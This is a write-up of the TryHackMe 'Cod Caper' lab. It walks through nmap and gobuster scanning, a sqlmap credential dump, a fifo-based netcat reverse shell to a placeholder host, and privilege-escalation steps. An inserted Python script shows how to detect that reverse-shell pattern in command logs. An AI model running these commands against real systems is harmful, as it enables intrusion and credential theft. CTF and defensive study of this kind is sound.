The Cod Caper — TryHackMe — Write Up

TonyRahmos
3 min read, Oct 28, 2020

Hello. I’m Rahmos. Here is my The Cod Caper — TryHackMe — Write Up. Check it out!

First, deploy the machine and run nmap to find open ports.

nmap -A -T4 -v <ip>


Now access the website, since port 80 (HTTP) is open. It's the default Apache page. Use gobuster to scan for hidden directories.

gobuster dir -u http://<ip> -w /path-to-wordlist

The hint told us to use big.txt, so let’s use that wordlist.

After the scan, we found /administrator.php

It's a login page. Now use sqlmap (as recommended) to test the form for a SQL injection vulnerability.

sqlmap -u http://<ip>/administrator.php --forms --batch

* The --batch flag makes sqlmap use the default answer for every question it asks, so you won't need to press "Y" for each one.

From the output we learn that there is a database named users. Run sqlmap again to dump everything in it:

sqlmap -u http://<ip>/administrator.php --forms --batch -D users --dump

We've got the admin username and password! Log in using those credentials.

It seems that we can execute commands.

First ls to view files.

ls

So there are 3 files in this directory (/var/www/html).

On your machine, use nc to start a listener on port 1234:

nc -lvnp 1234

Now execute this command in the web shell to spawn a reverse shell back to your listener:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <host-ip> 1234 >/tmp/f

Now you've got the shell.
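From the defender's side, the reverse shell above has a recognisable shape: a named pipe is created, an interactive /bin/sh reads from it, and the shell's output is piped into a netcat client. The script below is an added example, not part of the original write-up, that flags that combination in a constructed list of logged command lines (assumed format: one command per line, as a shell audit or EDR process log might record it).

```python
import re

# Constructed sample of logged command lines; line 2 is the write-up's payload
# with a made-up listener address, the rest are benign look-alikes.
SAMPLE_COMMANDS = [
    "ls -la /var/www/html",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.5 1234 >/tmp/f",
    "mkfifo /tmp/pipe && tail -f /tmp/pipe",
    "cat /etc/passwd",
    "nc -lvnp 1234",
    "nc -zv 10.0.0.5 1234",
]

# Each indicator is one building block of the fifo-based reverse shell.
INDICATORS = {
    "fifo": re.compile(r"\bmkfifo\b"),
    "shell": re.compile(r"/bin/(ba)?sh\b"),
    "netcat": re.compile(r"\b(nc|ncat|netcat)\s+\S+\s+\d{1,5}\b"),
}


def score_command(cmd):
    """Return the set of indicator names present in one command line."""
    return {name for name, rx in INDICATORS.items() if rx.search(cmd)}


def is_fifo_reverse_shell(cmd):
    """Flag a line only when all three building blocks co-occur; a lone
    mkfifo or a lone nc listener is normal admin activity."""
    return score_command(cmd) == set(INDICATORS)


def find_reverse_shells(lines):
    """Return (line_number, command) for every flagged line."""
    return [(i, cmd) for i, cmd in enumerate(lines, 1) if is_fifo_reverse_shell(cmd)]


if __name__ == "__main__":
    for n, cmd in find_reverse_shells(SAMPLE_COMMANDS):
        print(f"line {n}: {cmd}")
```

Requiring all three indicators keeps the false-positive rate low on hosts where named pipes or netcat are used legitimately; tune the netcat pattern to the binaries actually present on your systems.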

Run cat /etc/passwd to find the other user.

Well he’s papa.

Then use find to search for the SSH password:

find / -name pass -type f 2>/dev/null


Now download the LinEnum.sh script and copy it to the target over SSH using scp.

You can download the script here:

Now scp:

scp LinEnum.sh pingu@<ip>:/tmp

Enter the SSH password found above, then cd /tmp and execute the script:

./LinEnum.sh -r report -e /tmp

You will find some interesting SUID files:


After that, run pwndbg as instructed in the room to get root. You can then read the contents of the root.txt file.
